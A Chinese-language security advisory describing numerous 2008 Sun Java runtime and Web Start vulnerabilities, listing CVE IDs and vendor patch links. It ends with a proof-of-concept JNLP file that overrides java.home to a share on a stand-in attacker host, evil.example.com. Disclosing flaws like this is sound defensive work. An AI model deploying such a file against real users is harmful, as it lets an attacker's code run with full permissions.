BUGTRAQ ID: 32620,32608
CVE(CAN) ID: CVE-2008-5339,CVE-2008-5340,CVE-2008-5341,CVE-2008-5342,CVE-2008-5343,CVE-2008-5344,CVE-2008-5345,CVE-2008-5346,CVE-2008-5347,CVE-2008-5348,CVE-2008-5349,CVE-2008-5350,CVE-2008-5351,CVE-2008-5352,CVE-2008-5353,CVE-2008-5354,CVE-2008-5355,CVE-2008-5356,CVE-2008-5357,CVE-2008-5358,CVE-2008-5359,CVE-2008-5360,CVE-2008-2086
Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。
Sun Java中的多个安全漏洞可能允许恶意用户绕过某些安全限制、泄露系统信息、导致拒绝服务或完全入侵有漏洞的系统。
JRE创建了名称不过随机的临时文件,这可能导致在受影响的系统上写入任意JAR文件并执行有限的操作。
Java AWT库在处理图形模型时存在错误,在ConvolveOp操作中使用的特制Raster图形模型可能导致堆溢出。
Java Web Start在处理某些GIF头值时的错误可能允许通过特制的splash logo导致内存破坏。
处理TrueType字体时的整数溢出可能导致堆溢出。
JRE中的错误可能导致创建到任意主机的网络连接。
启动Java Web Start应用程序时的错误可能允许不可信任的应用程序以当前用户的权限读写或执行本地文件。
不可信任的Java Web Start应用程序可以获取当前用户名和Java Web Start缓存的位置。
Java Web Start中的错误可能允许通过特制的JNLP文件修改系统属性,如java.home、java.ext.dirs和user.home。
Java Web Start和Java Plug-in中的错误可能导致劫持HTTP会话。
JRE applet类加载功能中的错误可能导致读取任意文件和创建到任意主机的网络连接。
Java Web Start BasicService中的错误可能导致在用户浏览器中打开任意本地文件。
Java Update机制没有检查下载的更新软件包的数字签名,这可能允许通过中间人或DNS伪造攻击执行任意代码。
在处理JAR文件的Main-Class清单项时的边界错误可能允许通过特制的JAR文件导致栈溢出。
还原序列号日历对象时的错误可能允许不可信任的Java applet读写或执行本地文件。
JRE中的整数溢出可能允许通过特制的Pack200压缩JAR文件导致堆溢出。
UTF-8解码器接受长于最短表单的编码,这可能导致使用解码器的应用程序通过特制URI接受无效的序列和泄露敏感信息。
JRE中的错误可能允许列出用户主目录的内容。
处理RSA公钥时的错误可能导致消耗大量CPU资源。
JRE Kerberos认证机制中的错误可能导致耗尽操作系统资源。
JAX-WS和JAXB JRE软件包中的错误可能允许不可信任的Java applet读写或执行本地文件。
处理ZIP文件时的错误可能导致泄露主机进程的任意内存位置。
从本地文件系统所加载的恶意代码可能获取对本地主机的网络访问。
处理TrueType字体时的边界错误可能导致堆溢出。
RedHat已经为此发布了一个安全公告(RHSA-2008:1025-01)以及相应补丁:
RHSA-2008:1025-01:Critical: java-1.5.0-sun security update
链接:<a href=“https://www.redhat.com/support/errata/RHSA-2008-1025.html” target=“_blank”>https://www.redhat.com/support/errata/RHSA-2008-1025.html</a>
Sun已经为此发布了一个安全公告(Sun-Alert-246387)以及相应补丁:
Sun-Alert-246387:A Security Vulnerability in the Java Runtime Environment may Allow Code Loaded From the Local Filesystem to Access LocalHost
链接:<a href=“http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1” target=“_blank”>http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1</a>
补丁下载:
<a href=“http://java.sun.com/javase/downloads/index.jsp” target=“_blank”>http://java.sun.com/javase/downloads/index.jsp</a>
<a href=“http://java.sun.com/javase/downloads/index_jdk5.jsp” target=“_blank”>http://java.sun.com/javase/downloads/index_jdk5.jsp</a>
<a href=“http://java.sun.com/j2se/1.4.2/download.html” target=“_blank”>http://java.sun.com/j2se/1.4.2/download.html</a>
<a href=“http://java.sun.com/j2se/1.3/download.html” target=“_blank”>http://java.sun.com/j2se/1.3/download.html</a>
<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
<information>
<title>Trusted Application</title>
<vendor>Trusted Vendor</vendor>
<description>Trusted Application by Trusted Vendor</description>
<homepage href="http://trusted.example.org/" />
<offline-allowed />
</information>
<security><all-permissions /></security>
<resources>
<j2se version="1.5+" />
<!-- Next line overrides the JRE's java.home System property -->
<property name="java.home" value="\\evil.example.com\jre" />
<jar href="signed-and-trusted-jce-dependent-library.jar" />
</resources>
<application-desc main-class="org.example.trusted.app.StartApp" />
</jnlp>